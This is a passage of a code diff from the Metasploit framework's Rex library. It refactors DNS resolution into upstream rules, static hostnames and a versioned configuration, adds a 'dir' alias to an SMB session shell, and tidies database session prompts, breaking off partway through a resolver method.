|
||||
history_manager = Msf::Config.mysql_session_history
|
||||
super(prompt, '>', history_manager, nil, :mysql)
|
||||
|
||||
@@ -119,13 +119,14 @@ module Rex
|
||||
attr_reader :client
|
||||
|
||||
# @return [String]
|
||||
attr_accessor :cwd
|
||||
def database_name
|
||||
client.database
|
||||
end
|
||||
|
||||
# @param [Object] val
|
||||
# @return [String]
|
||||
def format_prompt(val)
|
||||
@cwd ||= client.database
|
||||
prompt = "%undMySQL @ #{client.socket.peerinfo} (#{@cwd})%clr > "
|
||||
prompt = "%undMySQL @ #{client.socket.peerinfo} (#{database_name})%clr > "
|
||||
substitute_colors(prompt, true)
|
||||
end
|
||||
|
||||
|
||||
@@ -30,8 +30,7 @@ module Rex
|
||||
# The postgresql client context
|
||||
self.session = session
|
||||
self.client = session.client
|
||||
self.cwd = client.params['database']
|
||||
prompt = "%undPostgreSQL @ #{client.conn.peerinfo} (#{cwd})%clr"
|
||||
prompt = "%undPostgreSQL @ #{client.conn.peerinfo} (#{database_name})%clr"
|
||||
history_manager = Msf::Config.postgresql_session_history
|
||||
super(prompt, '>', history_manager, nil, :postgresql)
|
||||
|
||||
@@ -136,11 +135,12 @@ module Rex
|
||||
attr_reader :client # :nodoc:
|
||||
|
||||
# @return [String]
|
||||
attr_accessor :cwd
|
||||
def database_name
|
||||
client.params['database']
|
||||
end
|
||||
|
||||
def format_prompt(val)
|
||||
cwd ||= client.params['database']
|
||||
prompt = "%undPostgreSQL @ #{client.conn.peerinfo} (#{cwd})%clr > "
|
||||
prompt = "%undPostgreSQL @ #{client.conn.peerinfo} (#{database_name})%clr > "
|
||||
substitute_colors(prompt, true)
|
||||
end
|
||||
|
||||
|
||||
@@ -55,6 +55,7 @@ module Rex
|
||||
cmds = {
|
||||
'shares' => 'View the available shares and interact with one',
|
||||
'ls' => 'List all files in the current directory',
|
||||
'dir' => 'List all files in the current directory (alias for ls)',
|
||||
'pwd' => 'Print the current remote working directory',
|
||||
'cd' => 'Change the current remote working directory',
|
||||
'cat' => 'Read the file at the given path'
|
||||
@@ -181,12 +182,31 @@ module Rex
|
||||
print_line table.to_s
|
||||
end
|
||||
|
||||
def cmd_ls_help
|
||||
print_line 'Usage:'
|
||||
print_line 'ls [options] [path]'
|
||||
print_line
|
||||
print_line 'COMMAND ALIASES:'
|
||||
print_line
|
||||
print_line ' dir'
|
||||
print_line
|
||||
print_line 'Lists contents of directory or file info'
|
||||
print_line @@ls_opts.usage
|
||||
end
|
||||
|
||||
def cmd_ls_tabs(_str, words)
|
||||
return [] if words.length > 1
|
||||
|
||||
@@ls_opts.option_keys
|
||||
end
|
||||
|
||||
#
|
||||
# Alias the ls command to dir, for those of us who have windows muscle-memory
|
||||
#
|
||||
alias cmd_dir cmd_ls
|
||||
alias cmd_dir_help cmd_ls_help
|
||||
alias cmd_dir_tabs cmd_ls_tabs
|
||||
|
||||
def cmd_pwd_help
|
||||
print_line 'Usage: pwd'
|
||||
print_line
|
||||
|
||||
@@ -57,22 +57,11 @@ module DNS
|
||||
end
|
||||
|
||||
#
|
||||
# Add static record to cache
|
||||
# Delete all cache entries, this is different from pruning because the
|
||||
# record's expiration is ignored
|
||||
#
|
||||
# @param name [String] Name of record
|
||||
# @param address [String] Address of record
|
||||
# @param type [Dnsruby::Types] Record type to add
|
||||
# @param replace [TrueClass, FalseClass] Replace existing records
|
||||
def add_static(name, address, type = Dnsruby::Types::A, replace = false)
|
||||
if Rex::Socket.is_ip_addr?(address.to_s) and
|
||||
( name.to_s.match(MATCH_HOSTNAME) or name == '*')
|
||||
find(name, type).each do |found|
|
||||
delete(found)
|
||||
end if replace
|
||||
add(Dnsruby::RR.create(name: name, type: type, address: address),0)
|
||||
else
|
||||
raise "Invalid parameters for static entry - #{name}, #{address}, #{type}"
|
||||
end
|
||||
def flush
|
||||
self.records.each {|rec, _| delete(rec)}
|
||||
end
|
||||
|
||||
#
|
||||
|
||||
@@ -24,55 +24,6 @@ module DNS
|
||||
dns_cache_no_start = config.delete(:dns_cache_no_start)
|
||||
super(config)
|
||||
self.cache = Rex::Proto::DNS::Cache.new
|
||||
# Read hostsfile into cache
|
||||
hf = Rex::Compat.is_windows ? '%WINDIR%/system32/drivers/etc/hosts' : '/etc/hosts'
|
||||
entries = begin
|
||||
File.read(hf).lines.map(&:strip).select do |entry|
|
||||
Rex::Socket.is_ip_addr?(entry.gsub(/\s+/,' ').split(' ').first) and
|
||||
not entry.match(/::.*ip6-/) # Ignore Debian/Ubuntu-specific notation for IPv6 hosts
|
||||
end.map do |entry|
|
||||
entry.gsub(/\s+/,' ').split(' ')
|
||||
end
|
||||
rescue => e
|
||||
@logger.error(e)
|
||||
[]
|
||||
end
|
||||
entries.each do |ent|
|
||||
next if ent.first =~ /^127\./
|
||||
# Deal with multiple hostnames per address
|
||||
while ent.length > 2
|
||||
hostname = ent.pop
|
||||
next unless MATCH_HOSTNAME.match hostname
|
||||
begin
|
||||
if Rex::Socket.is_ipv4?(ent.first)
|
||||
self.cache.add_static(hostname, ent.first, Dnsruby::Types::A)
|
||||
elsif Rex::Socket.is_ipv6?(ent.first)
|
||||
self.cache.add_static(hostname, ent.first, Dnsruby::Types::AAAA)
|
||||
else
|
||||
raise "Unknown IP address format #{ent.first} in hosts file!"
|
||||
end
|
||||
rescue => e
|
||||
# Deal with edge-cases in users' hostsfile
|
||||
@logger.error(e)
|
||||
end
|
||||
end
|
||||
hostname = ent.pop
|
||||
begin
|
||||
if MATCH_HOSTNAME.match hostname
|
||||
if Rex::Socket.is_ipv4?(ent.first)
|
||||
self.cache.add_static(hostname, ent.first, Dnsruby::Types::A)
|
||||
elsif Rex::Socket.is_ipv6?(ent.first)
|
||||
self.cache.add_static(hostname, ent.first, Dnsruby::Types::AAAA)
|
||||
else
|
||||
raise "Unknown IP address format #{ent.first} in hosts file!"
|
||||
end
|
||||
end
|
||||
rescue => e
|
||||
# Deal with edge-cases in users' hostsfile
|
||||
@logger.error(e)
|
||||
end
|
||||
end
|
||||
# TODO: inotify or similar on hostsfile for live updates? Easy-button functionality
|
||||
self.cache.start unless dns_cache_no_start
|
||||
return
|
||||
end
|
||||
|
||||
@@ -1,3 +1,5 @@
|
||||
require 'rex/proto/dns/upstream_resolver'
|
||||
|
||||
module Rex
|
||||
module Proto
|
||||
module DNS
|
||||
@@ -7,11 +9,12 @@ module DNS
|
||||
# for different requests, based on the domain being queried.
|
||||
##
|
||||
module CustomNameserverProvider
|
||||
CONFIG_KEY = 'framework/dns'
|
||||
CONFIG_KEY_BASE = 'framework/dns'
|
||||
CONFIG_VERSION = Rex::Version.new('1.0')
|
||||
|
||||
#
|
||||
# A Comm implementation that always reports as dead, so should never
|
||||
# be used. This is used to prevent DNS leaks of saved DNS rules that
|
||||
# be used. This is used to prevent DNS leaks of saved DNS rules that
|
||||
# were attached to a specific channel.
|
||||
##
|
||||
class CommSink
|
||||
@@ -31,128 +34,120 @@ module DNS
|
||||
end
|
||||
|
||||
def init
|
||||
self.entries_with_rules = []
|
||||
self.entries_without_rules = []
|
||||
self.next_id = 0
|
||||
@upstream_rules = []
|
||||
|
||||
resolvers = [UpstreamResolver.create_static]
|
||||
if @config[:nameservers].empty?
|
||||
# if no nameservers are specified, fallback to the system
|
||||
resolvers << UpstreamResolver.create_system
|
||||
else
|
||||
# migrate the originally configured name servers
|
||||
resolvers += @config[:nameservers].map(&:to_s)
|
||||
@config[:nameservers].clear
|
||||
end
|
||||
|
||||
add_upstream_rule(resolvers)
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
# Reinitialize the configuration to its original state.
|
||||
def reinit
|
||||
parse_config_file
|
||||
parse_environment_variables
|
||||
|
||||
self.static_hostnames.flush
|
||||
self.static_hostnames.parse_hosts_file
|
||||
|
||||
init
|
||||
|
||||
cache.flush if respond_to?(:cache)
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
# Check whether or not there is configuration data in Metasploit's configuration file which is persisted on disk.
|
||||
def has_config?
|
||||
config = Msf::Config.load
|
||||
version = config.fetch(CONFIG_KEY_BASE, {}).fetch('configuration_version', nil)
|
||||
if version.nil?
|
||||
@logger.info 'DNS configuration can not be loaded because the version is missing'
|
||||
return false
|
||||
end
|
||||
|
||||
their_version = Rex::Version.new(version)
|
||||
if their_version > CONFIG_VERSION # if the config is newer, it's incompatible (we only guarantee backwards compat)
|
||||
@logger.info "DNS configuration version #{their_version} can not be loaded because it is too new"
|
||||
return false
|
||||
end
|
||||
|
||||
my_minimum_version = Rex::Version.new(CONFIG_VERSION.canonical_segments.first.to_s)
|
||||
if their_version < my_minimum_version # can not be older than our major version
|
||||
@logger.info "DNS configuration version #{their_version} can not be loaded because it is too old"
|
||||
return false
|
||||
end
|
||||
|
||||
true
|
||||
end
|
||||
|
||||
#
|
||||
# Save the custom settings to the MSF config file
|
||||
#
|
||||
def save_config
|
||||
new_config = {}
|
||||
[self.entries_with_rules, self.entries_without_rules].each do |entry_set|
|
||||
entry_set.each do |entry|
|
||||
key = entry[:id].to_s
|
||||
val = [entry[:wildcard_rules].join(','),
|
||||
entry[:dns_server],
|
||||
(!entry[:comm].nil?).to_s
|
||||
].join(';')
|
||||
new_config[key] = val
|
||||
end
|
||||
end
|
||||
new_config = {
|
||||
'configuration_version' => CONFIG_VERSION.to_s
|
||||
}
|
||||
Msf::Config.save(CONFIG_KEY_BASE => new_config)
|
||||
|
||||
Msf::Config.save(CONFIG_KEY => new_config)
|
||||
save_config_upstream_rules
|
||||
save_config_static_hostnames
|
||||
end
|
||||
|
||||
#
|
||||
# Load the custom settings from the MSF config file
|
||||
#
|
||||
def load_config
|
||||
config = Msf::Config.load
|
||||
|
||||
with_rules = []
|
||||
without_rules = []
|
||||
next_id = 0
|
||||
|
||||
dns_settings = config.fetch(CONFIG_KEY, {}).each do |name, value|
|
||||
id = name.to_i
|
||||
wildcard_rules, dns_server, uses_comm = value.split(';')
|
||||
wildcard_rules = wildcard_rules.split(',')
|
||||
|
||||
raise Msf::Config::ConfigError.new('DNS parsing failed: Comm must be true or false') unless ['true','false'].include?(uses_comm)
|
||||
raise Msf::Config::ConfigError.new('Invalid DNS config: Invalid DNS server') unless Rex::Socket.is_ip_addr?(dns_server)
|
||||
raise Msf::Config::ConfigError.new('Invalid DNS config: Invalid rule') unless wildcard_rules.all? {|rule| valid_rule?(rule)}
|
||||
|
||||
comm = uses_comm == 'true' ? CommSink.new : nil
|
||||
entry = {
|
||||
:wildcard_rules => wildcard_rules,
|
||||
:dns_server => dns_server,
|
||||
:comm => comm,
|
||||
:id => id
|
||||
}
|
||||
|
||||
if wildcard_rules.empty?
|
||||
without_rules << entry
|
||||
else
|
||||
with_rules << entry
|
||||
end
|
||||
|
||||
next_id = [id + 1, next_id].max
|
||||
unless has_config?
|
||||
raise ResolverError.new('There is no compatible configuration data to load')
|
||||
end
|
||||
|
||||
# Now that config has successfully read, update the global values
|
||||
self.entries_with_rules = with_rules
|
||||
self.entries_without_rules = without_rules
|
||||
self.next_id = next_id
|
||||
load_config_entries
|
||||
load_config_static_hostnames
|
||||
end
|
||||
|
||||
# Add a custom nameserver entry to the custom provider
|
||||
# @param wildcard_rules [Array<String>] The wildcard rules to match a DNS request against
|
||||
# @param dns_server [Array<String>] The list of IP addresses that would be used for this custom rule
|
||||
# @param comm [Msf::Session::Comm] The communication channel to be used for these DNS requests
|
||||
def add_nameserver(wildcard_rules, dns_server, comm)
|
||||
raise ::ArgumentError.new("Invalid DNS server: #{dns_server}") unless Rex::Socket.is_ip_addr?(dns_server)
|
||||
wildcard_rules.each do |rule|
|
||||
raise ::ArgumentError.new("Invalid rule: #{rule}") unless valid_rule?(rule)
|
||||
end
|
||||
# Add a custom nameserver entry to the custom provider.
|
||||
#
|
||||
# @param [Array<String>] resolvers The list of upstream resolvers that would be used for this custom rule.
|
||||
# @param [Msf::Session::Comm] comm The communication channel to be used for these DNS requests.
|
||||
# @param [String] wildcard The wildcard rule to match a DNS request against.
|
||||
# @param [Integer] index The index at which to insert the rule, defaults to -1 to append it at the end.
|
||||
def add_upstream_rule(resolvers, comm: nil, wildcard: '*', index: -1)
|
||||
resolvers = [resolvers] if resolvers.is_a?(String) # coerce into an array of strings
|
||||
|
||||
entry = {
|
||||
:wildcard_rules => wildcard_rules,
|
||||
:dns_server => dns_server,
|
||||
:comm => comm,
|
||||
:id => self.next_id
|
||||
}
|
||||
self.next_id += 1
|
||||
if wildcard_rules.empty?
|
||||
entries_without_rules << entry
|
||||
else
|
||||
entries_with_rules << entry
|
||||
end
|
||||
@upstream_rules.insert(index, UpstreamRule.new(
|
||||
wildcard: wildcard,
|
||||
resolvers: resolvers,
|
||||
comm: comm
|
||||
))
|
||||
end
|
||||
|
||||
#
|
||||
# Remove entries with the given IDs
|
||||
# Remove upstream rules with the given indexes
|
||||
# Ignore entries that are not found
|
||||
# @param ids [Array<Integer>] The IDs to removed
|
||||
# @return [Array<Hash>] The removed entries
|
||||
#
|
||||
# @return [Array<UpstreamRule>] The removed entries
|
||||
def remove_ids(ids)
|
||||
removed= []
|
||||
ids.each do |id|
|
||||
removed_with, remaining_with = self.entries_with_rules.partition {|entry| entry[:id] == id}
|
||||
self.entries_with_rules.replace(remaining_with)
|
||||
|
||||
removed_without, remaining_without = self.entries_without_rules.partition {|entry| entry[:id] == id}
|
||||
self.entries_without_rules.replace(remaining_without)
|
||||
|
||||
removed.concat(removed_with)
|
||||
removed.concat(removed_without)
|
||||
removed = []
|
||||
ids.sort.reverse.each do |id|
|
||||
upstream_rule = @upstream_rules.delete_at(id)
|
||||
removed << upstream_rule if upstream_rule
|
||||
end
|
||||
|
||||
removed
|
||||
removed.reverse
|
||||
end
|
||||
|
||||
#
|
||||
# The custom nameserver entries that have been configured
|
||||
# @return [Array<Array>] An array containing two elements: The entries with rules, and the entries without rules
|
||||
#
|
||||
def nameserver_entries
|
||||
[entries_with_rules, entries_without_rules]
|
||||
end
|
||||
|
||||
def purge
|
||||
init
|
||||
def flush
|
||||
@upstream_rules.clear
|
||||
end
|
||||
|
||||
# The nameservers that match the given packet
|
||||
@@ -160,7 +155,7 @@ module DNS
|
||||
# @raise [ResolveError] If the packet contains multiple questions, which would end up sending to a different set of nameservers
|
||||
# @return [Array<Array>] A list of nameservers, each with Rex::Socket options
|
||||
#
|
||||
def nameservers_for_packet(packet)
|
||||
def upstream_resolvers_for_packet(packet)
|
||||
unless feature_set.enabled?(Msf::FeatureManager::DNS_FEATURE)
|
||||
return super
|
||||
end
|
||||
@@ -171,33 +166,15 @@ module DNS
|
||||
results_from_all_questions = []
|
||||
packet.question.each do |question|
|
||||
name = question.qname.to_s
|
||||
dns_servers = []
|
||||
upstream_rule = self.upstream_rules.find { |ur| ur.matches_name?(name) }
|
||||
|
||||
self.entries_with_rules.each do |entry|
|
||||
entry[:wildcard_rules].each do |rule|
|
||||
if matches(name, rule)
|
||||
socket_options = {}
|
||||
socket_options['Comm'] = entry[:comm] unless entry[:comm].nil?
|
||||
dns_servers.append([entry[:dns_server], socket_options])
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Only look at the rule-less entries if no rules were found (avoids DNS leaks)
|
||||
if dns_servers.empty?
|
||||
self.entries_without_rules.each do |entry|
|
||||
socket_options = {}
|
||||
socket_options['Comm'] = entry[:comm] unless entry[:comm].nil?
|
||||
dns_servers.append([entry[:dns_server], socket_options])
|
||||
end
|
||||
end
|
||||
|
||||
if dns_servers.empty?
|
||||
if upstream_rule
|
||||
upstream_resolvers = upstream_rule.resolvers
|
||||
else
|
||||
# Fall back to default nameservers
|
||||
dns_servers = super
|
||||
upstream_resolvers = super
|
||||
end
|
||||
results_from_all_questions << dns_servers.uniq
|
||||
results_from_all_questions << upstream_resolvers.uniq
|
||||
end
|
||||
results_from_all_questions.uniq!
|
||||
if results_from_all_questions.size != 1
|
||||
@@ -215,28 +192,85 @@ module DNS
|
||||
self.feature_set = framework.features
|
||||
end
|
||||
|
||||
private
|
||||
#
|
||||
# Is the given wildcard DNS entry valid?
|
||||
#
|
||||
def valid_rule?(rule)
|
||||
rule =~ /^(\*\.)?([a-z\d][a-z\d-]*[a-z\d]\.)+[a-z]+$/
|
||||
def upstream_rules
|
||||
@upstream_rules.dup
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
def matches(domain, pattern)
|
||||
if pattern.start_with?('*.')
|
||||
domain.downcase.end_with?(pattern[1..-1].downcase)
|
||||
else
|
||||
domain.casecmp?(pattern)
|
||||
def load_config_entries
|
||||
config = Msf::Config.load
|
||||
|
||||
with_rules = []
|
||||
config.fetch("#{CONFIG_KEY_BASE}/entries", {}).each do |_name, value|
|
||||
wildcard, resolvers, uses_comm = value.split(';')
|
||||
wildcard = '*' if wildcard.blank?
|
||||
resolvers = resolvers.split(',')
|
||||
uses_comm.downcase!
|
||||
|
||||
raise Rex::Proto::DNS::Exceptions::ConfigError.new('DNS parsing failed: Comm must be true or false') unless ['true','false'].include?(uses_comm)
|
||||
raise Rex::Proto::DNS::Exceptions::ConfigError.new('Invalid DNS config: Invalid upstream DNS resolver') unless resolvers.all? {|resolver| UpstreamRule.valid_resolver?(resolver) }
|
||||
raise Rex::Proto::DNS::Exceptions::ConfigError.new('Invalid DNS config: Invalid rule') unless UpstreamRule.valid_wildcard?(wildcard)
|
||||
|
||||
comm = uses_comm == 'true' ? CommSink.new : nil
|
||||
with_rules << UpstreamRule.new(
|
||||
wildcard: wildcard,
|
||||
resolvers: resolvers,
|
||||
comm: comm
|
||||
)
|
||||
end
|
||||
|
||||
# Now that config has successfully read, update the global values
|
||||
@upstream_rules = with_rules
|
||||
end
|
||||
|
||||
def load_config_static_hostnames
|
||||
config = Msf::Config.load
|
||||
|
||||
static_hostnames.flush
|
||||
config.fetch("#{CONFIG_KEY_BASE}/static_hostnames", {}).each do |_name, value|
|
||||
hostname, ip_addresses = value.split(';', 2)
|
||||
ip_addresses.split(',').each do |ip_address|
|
||||
next if ip_address.blank?
|
||||
|
||||
unless Rex::Socket.is_ip_addr?(ip_address)
|
||||
raise Rex::Proto::DNS::Exceptions::ConfigError.new('Invalid DNS config: Invalid IP address')
|
||||
end
|
||||
|
||||
static_hostnames.add(hostname, ip_address)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
attr_accessor :entries_with_rules # Set of custom nameserver entries that specify a rule
|
||||
attr_accessor :entries_without_rules # Set of custom nameserver entries that do not include a rule
|
||||
attr_accessor :next_id # The next ID to have been allocated to an entry
|
||||
def save_config_upstream_rules
|
||||
new_config = {}
|
||||
@upstream_rules.each_with_index do |entry, index|
|
||||
val = [
|
||||
entry.wildcard,
|
||||
entry.resolvers.map do |resolver|
|
||||
resolver.type == Rex::Proto::DNS::UpstreamResolver::Type::DNS_SERVER ? resolver.destination : resolver.type.to_s
|
||||
end.join(','),
|
||||
(!entry.comm.nil?).to_s
|
||||
].join(';')
|
||||
new_config["##{index}"] = val
|
||||
end
|
||||
Msf::Config.save("#{CONFIG_KEY_BASE}/upstream_rules" => new_config)
|
||||
end
|
||||
|
||||
def save_config_static_hostnames
|
||||
new_config = {}
|
||||
static_hostnames.each_with_index do |(hostname, addresses), index|
|
||||
val = [
|
||||
hostname,
|
||||
(addresses.fetch(Dnsruby::Types::A, []) + addresses.fetch(Dnsruby::Types::AAAA, [])).join(',')
|
||||
].join(';')
|
||||
new_config["##{index}"] = val
|
||||
end
|
||||
Msf::Config.save("#{CONFIG_KEY_BASE}/static_hostnames" => new_config)
|
||||
end
|
||||
|
||||
attr_accessor :feature_set
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
@@ -0,0 +1,14 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
module Rex
|
||||
module Proto
|
||||
module DNS
|
||||
module Exceptions
|
||||
|
||||
class ConfigError < Rex::RuntimeError
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
+161
-56
@@ -14,11 +14,11 @@ module DNS
|
||||
class Resolver < Net::DNS::Resolver
|
||||
|
||||
Defaults = {
|
||||
:config_file => "/etc/resolv.conf",
|
||||
:config_file => nil,
|
||||
:log_file => File::NULL, # formerly $stdout, should be tied in with our loggers
|
||||
:port => 53,
|
||||
:searchlist => [],
|
||||
:nameservers => [IPAddr.new("127.0.0.1")],
|
||||
:nameservers => [],
|
||||
:domain => "",
|
||||
:source_port => 0,
|
||||
:source_address => IPAddr.new("0.0.0.0"),
|
||||
@@ -30,21 +30,23 @@ module DNS
|
||||
:use_tcp => false,
|
||||
:ignore_truncated => false,
|
||||
:packet_size => 512,
|
||||
:tcp_timeout => 30,
|
||||
:udp_timeout => 30,
|
||||
:tcp_timeout => TcpTimeout.new(5),
|
||||
:udp_timeout => UdpTimeout.new(5),
|
||||
:context => {},
|
||||
:comm => nil
|
||||
:comm => nil,
|
||||
:static_hosts => {}
|
||||
}
|
||||
|
||||
attr_accessor :context, :comm
|
||||
attr_accessor :context, :comm, :static_hostnames
|
||||
#
|
||||
# Provide override for initializer to use local Defaults constant
|
||||
#
|
||||
# @param config [Hash] Configuration options as conusumed by parent class
|
||||
# @param config [Hash] Configuration options as consumed by parent class
|
||||
def initialize(config = {})
|
||||
raise ResolverArgumentError, "Argument has to be Hash" unless config.kind_of? Hash
|
||||
# config.key_downcase!
|
||||
@config = Defaults.merge config
|
||||
@config[:config_file] ||= self.class.default_config_file
|
||||
@raw = false
|
||||
# New logger facility
|
||||
@logger = Logger.new(@config[:log_file])
|
||||
@@ -58,8 +60,6 @@ module DNS
|
||||
# 4) defaults (and /etc/resolv.conf for config)
|
||||
#------------------------------------------------------------
|
||||
|
||||
|
||||
|
||||
#------------------------------------------------------------
|
||||
# Parsing config file
|
||||
#------------------------------------------------------------
|
||||
@@ -74,7 +74,8 @@ module DNS
|
||||
# Parsing arguments
|
||||
#------------------------------------------------------------
|
||||
comm = config.delete(:comm)
|
||||
context = context = config.delete(:context)
|
||||
context = config.delete(:context)
|
||||
static_hosts = config.delete(:static_hosts)
|
||||
config.each do |key,val|
|
||||
next if key == :log_file or key == :config_file
|
||||
begin
|
||||
@@ -83,6 +84,8 @@ module DNS
|
||||
raise ResolverArgumentError, "Option #{key} not valid"
|
||||
end
|
||||
end
|
||||
self.static_hostnames = StaticHostnames.new(hostnames: static_hosts)
|
||||
self.static_hostnames.parse_hosts_file
|
||||
end
|
||||
#
|
||||
# Provides current proxy setting if configured
|
||||
@@ -115,8 +118,18 @@ module DNS
|
||||
#
|
||||
# @return [Array<Array>] A list of nameservers, each with Rex::Socket options
|
||||
#
|
||||
def nameservers_for_packet(_dns_message)
|
||||
@config[:nameservers].map {|ns| [ns.to_s, {}]}
|
||||
def upstream_resolvers_for_packet(_dns_message)
|
||||
@config[:nameservers].map do |ns|
|
||||
UpstreamResolver.create_dns_server(ns.to_s)
|
||||
end
|
||||
end
|
||||
|
||||
def upstream_resolvers_for_query(name, type = Dnsruby::Types::A, cls = Dnsruby::Classes::IN)
|
||||
name, type, cls = preprocess_query_arguments(name, type, cls)
|
||||
net_packet = make_query_packet(name, type, cls)
|
||||
# This returns a Net::DNS::Packet. Convert to Dnsruby::Message for consistency
|
||||
packet = Rex::Proto::DNS::Packet.encode_drb(net_packet)
|
||||
upstream_resolvers_for_packet(packet)
|
||||
end
|
||||
|
||||
#
|
||||
@@ -128,8 +141,6 @@ module DNS
|
||||
# @return [Dnsruby::Message] DNS response
|
||||
#
|
||||
def send(argument, type = Dnsruby::Types::A, cls = Dnsruby::Classes::IN)
|
||||
method = self.use_tcp? ? :send_tcp : :send_udp
|
||||
|
||||
case argument
|
||||
when Dnsruby::Message
|
||||
packet = argument
|
||||
@@ -141,46 +152,33 @@ module DNS
|
||||
packet = Rex::Proto::DNS::Packet.encode_drb(net_packet)
|
||||
end
|
||||
|
||||
nameservers = nameservers_for_packet(packet)
|
||||
if nameservers.size == 0
|
||||
raise ResolverError, "No nameservers specified!"
|
||||
|
||||
upstream_resolvers = upstream_resolvers_for_packet(packet)
|
||||
if upstream_resolvers.empty?
|
||||
raise ResolverError, "No upstream resolvers specified!"
|
||||
end
|
||||
|
||||
# Store packet_data for performance improvements,
|
||||
# so methods don't keep on calling Packet#encode
|
||||
packet_data = packet.encode
|
||||
packet_size = packet_data.size
|
||||
|
||||
# Choose whether use TCP, UDP
|
||||
if packet_size > @config[:packet_size] # Must use TCP
|
||||
@logger.info "Sending #{packet_size} bytes using TCP due to size"
|
||||
method = :send_tcp
|
||||
else # Packet size is inside the boundaries
|
||||
if use_tcp? or !(proxies.nil? or proxies.empty?) # User requested TCP
|
||||
@logger.info "Sending #{packet_size} bytes using TCP due to tcp flag"
|
||||
method = :send_tcp
|
||||
elsif !supports_udp?(nameservers)
|
||||
@logger.info "Sending #{packet_size} bytes using TCP due to the presence of a non-UDP-compatible comm channel"
|
||||
method = :send_tcp
|
||||
else # Finally use UDP
|
||||
@logger.info "Sending #{packet_size} bytes using UDP"
|
||||
method = :send_udp unless method == :send_tcp
|
||||
ans = nil
|
||||
upstream_resolvers.each do |upstream_resolver|
|
||||
case upstream_resolver.type
|
||||
when UpstreamResolver::Type::BLACK_HOLE
|
||||
ans = resolve_via_blackhole(upstream_resolver, packet, type, cls)
|
||||
when UpstreamResolver::Type::DNS_SERVER
|
||||
ans = resolve_via_dns_server(upstream_resolver, packet, type, cls)
|
||||
when UpstreamResolver::Type::STATIC
|
||||
ans = resolve_via_static(upstream_resolver, packet, type, cls)
|
||||
when UpstreamResolver::Type::SYSTEM
|
||||
ans = resolve_via_system(upstream_resolver, packet, type, cls)
|
||||
end
|
||||
end
|
||||
|
||||
if type == Dnsruby::Types::AXFR
|
||||
@logger.warn "AXFR query, switching to TCP" unless method == :send_tcp
|
||||
method = :send_tcp
|
||||
break if (ans and ans[0].length > 0)
|
||||
end
|
||||
|
||||
ans = self.__send__(method, packet, packet_data, nameservers)
|
||||
|
||||
unless (ans and ans[0].length > 0)
|
||||
@logger.fatal "No response from nameservers list: aborting"
|
||||
@logger.fatal "No response from upstream resolvers: aborting"
|
||||
raise NoResponseError
|
||||
end
|
||||
|
||||
@logger.info "Received #{ans[0].size} bytes from #{ans[1][2]+":"+ans[1][1].to_s}"
|
||||
# response = Net::DNS::Packet.parse(ans[0],ans[1])
|
||||
response = Dnsruby::Message.decode(ans[0])
|
||||
|
||||
@@ -386,28 +384,135 @@ module DNS
|
||||
#
|
||||
# @return ans [Dnsruby::Message] DNS Response
|
||||
def query(name, type = Dnsruby::Types::A, cls = Dnsruby::Classes::IN)
|
||||
name, type, cls = preprocess_query_arguments(name, type, cls)
|
||||
@logger.debug "Query(#{name},#{Dnsruby::Types.new(type)},#{Dnsruby::Classes.new(cls)})"
|
||||
send(name,type,cls)
|
||||
end
|
||||
|
||||
return send(name,type,cls) if name.class == IPAddr
|
||||
def self.default_config_file
|
||||
%w[
|
||||
/etc/resolv.conf
|
||||
/data/data/com.termux/files/usr/etc/resolv.conf
|
||||
].find do |path|
|
||||
File.file?(path) && File.readable?(path)
|
||||
end
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
def preprocess_query_arguments(name, type, cls)
|
||||
return [name, type, cls] if name.class == IPAddr
|
||||
|
||||
# If the name doesn't contain any dots then append the default domain.
|
||||
if name !~ /\./ and name !~ /:/ and @config[:defname]
|
||||
name += "." + @config[:domain]
|
||||
end
|
||||
|
||||
@logger.debug "Query(#{name},#{Dnsruby::Types.new(type)},#{Dnsruby::Classes.new(cls)})"
|
||||
|
||||
return send(name,type,cls)
|
||||
|
||||
[name, type, cls]
|
||||
end
|
||||
|
||||
private
|
||||
def resolve_via_dns_server(upstream_resolver, packet, type, _cls)
|
||||
method = self.use_tcp? ? :send_tcp : :send_udp
|
||||
|
||||
def supports_udp?(nameserver_results)
|
||||
nameserver_results.each do |nameserver, socket_options|
|
||||
comm = socket_options.fetch('Comm') { @config[:comm] || Rex::Socket::SwitchBoard.best_comm(nameserver) }
|
||||
next if comm.nil?
|
||||
return false unless comm.supports_udp?
|
||||
# Store packet_data for performance improvements,
|
||||
# so methods don't keep on calling Packet#encode
|
||||
packet_data = packet.encode
|
||||
packet_size = packet_data.size
|
||||
|
||||
# Choose whether use TCP, UDP
|
||||
if packet_size > @config[:packet_size] # Must use TCP
|
||||
@logger.info "Sending #{packet_size} bytes using TCP due to size"
|
||||
method = :send_tcp
|
||||
else # Packet size is inside the boundaries
|
||||
if use_tcp? or !(proxies.nil? or proxies.empty?) # User requested TCP
|
||||
@logger.info "Sending #{packet_size} bytes using TCP due to tcp flag"
|
||||
method = :send_tcp
|
||||
elsif !supports_udp?(upstream_resolver)
|
||||
@logger.info "Sending #{packet_size} bytes using TCP due to the presence of a non-UDP-compatible comm channel"
|
||||
method = :send_tcp
|
||||
else # Finally use UDP
|
||||
@logger.info "Sending #{packet_size} bytes using UDP"
|
||||
method = :send_udp unless method == :send_tcp
|
||||
end
|
||||
end
|
||||
|
||||
if type == Dnsruby::Types::AXFR
|
||||
@logger.warn "AXFR query, switching to TCP" unless method == :send_tcp
|
||||
method = :send_tcp
|
||||
end
|
||||
|
||||
nameserver = [upstream_resolver.destination, upstream_resolver.socket_options]
|
||||
ans = self.__send__(method, packet, packet_data, [nameserver])
|
||||
|
||||
if (ans and ans[0].length > 0)
|
||||
@logger.info "Received #{ans[0].size} bytes from #{ans[1][2]+":"+ans[1][1].to_s}"
|
||||
end
|
||||
|
||||
ans
|
||||
end
|
||||
|
||||
def resolve_via_blackhole(upstream_resolver, packet, type, cls)
|
||||
# do not just return nil because that will cause the next resolver to be used
|
||||
@logger.info "No response from upstream resolvers: blackholed"
|
||||
raise NoResponseError
|
||||
end
|
||||
|
||||
def resolve_via_static(upstream_resolver, packet, type, cls)
|
||||
